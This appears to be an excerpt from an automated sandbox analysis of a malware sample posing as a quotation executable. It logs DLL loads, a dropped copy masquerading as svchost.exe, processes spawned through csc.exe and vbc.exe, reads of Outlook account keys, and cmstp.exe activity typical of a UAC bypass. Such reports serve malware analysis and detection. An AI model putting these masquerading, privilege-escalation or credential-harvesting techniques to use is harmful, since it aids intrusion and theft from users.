Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elstrans.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: pstorec.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: cmutil.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: version.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: version.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: cmcfg32.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: cmlua.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: comsvcs.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: cmstplua.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: cmlua.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: pstorec.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: cmutil.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: version.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: version.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: cmutil.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: version.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: version.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\cmstp.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll

Source: C:\Users\user\Desktop\QUOTATION#30810.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmstp.exe	Automated click: OK
Source: C:\Windows\System32\cmstp.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\QUOTATION#30810.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Source: QUOTATION#30810.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION#30810.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: QUOTATION#30810.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.PDBy# source: svchost.exe, 00000028.00000002.1950250022.000000651B8F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: mscorlib.pdbp^ source: WER5A3A.tmp.dmp.48.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb. source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb(System.Object, System.Object[], System.Signature, Boolean) source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 00000028.00000002.1950250022.000000651B8F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbOneDrive=C:\Users\user\OneDriveh source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbn source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdber source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbme.Int source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: mscorlib.pdbh source: WER1988.tmp.dmp.29.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1979891281.000001D0E86AE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: pC:\Users\user\AppData\Roaming\svchost.PDB0 source: svchost.exe, 00000028.00000002.1950250022.000000651B8F3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 00000028.00000002.1979891281.000001D0E86AE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: mscorlib.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb:n source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: st.PDB source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr

Source: QUOTATION#30810.exe

Static PE information: 0x9CE0EC5F [Tue May 27 19:17:51 2053 UTC]

Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 26_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

26_2_0041CB50

Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Code function: 0_2_00007FFB4AF9CB5A pushad ; retf	0_2_00007FFB4AF9CB79
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Code function: 0_2_00007FFB4AF900BD pushad ; iretd	0_2_00007FFB4AF900C1
Source: C:\Users\user\Desktop\QUOTATION#30810.exe	Code function: 0_2_00007FFB4B07026B push esp; retf 4810h	0_2_00007FFB4B070312
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4AF800BD pushad ; iretd	9_2_00007FFB4AF800C1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4AF8CB5A pushad ; retf	9_2_00007FFB4AF8CB79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 9_2_00007FFB4B0601C8 push esp; retf 4810h	9_2_00007FFB4B060312
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF800BD pushad ; iretd	11_2_00007FFB4AF800C1
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF97B29 push cs; ret	11_2_00007FFB4AF97B3F
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4AF8CB5A pushad ; retf	11_2_00007FFB4AF8CB79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 11_2_00007FFB4B06026B push esp; retf 4810h	11_2_00007FFB4B060312
